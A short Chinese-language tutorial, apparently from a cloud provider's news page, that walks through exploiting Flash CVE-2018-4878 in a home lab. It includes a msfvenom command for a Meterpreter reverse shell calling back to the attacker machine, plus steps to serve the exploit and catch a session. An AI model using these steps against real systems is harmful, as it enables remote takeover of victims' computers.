您好,登錄后才能下訂單哦!
Adobe flash player 28漏洞攻擊的分析,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻擊者通過構造特殊的Flash鏈接,當用戶用瀏覽器/郵件/Office訪問此Flash鏈接時,會觸發漏洞,可直接getshell。準備工作:靶機信息:192.168.2.134(windows 7 SP1)Flash版本:28.0.0.137攻擊機信息:192.168.2.132(kali linux)漏洞利用腳本:CVE-2018-4878-master漏洞利用:
1.使用msfvenom生成shellcode,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.132 LPORT=7777 -f python>shellcode.txt>。
2.替換原 cve-2018-4878.py中的shellcode,并修改參數stageless=False。
3.在代碼中修改要生成的文件和路徑。
4.執行修改后的cve-2018-4878.py文件,生成index和exploit兩個文件。
5.將生成的兩個文件復制到web目錄環境下。
6.在kali的msf中啟用監聽。
7.在win7主機中使用含漏洞的瀏覽器和Adobe Flash訪問http://192.168.2.132/index.html,kali中即可獲取到靶機會話。
看完上述內容,你們掌握Adobe flash player 28漏洞攻擊的分析的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。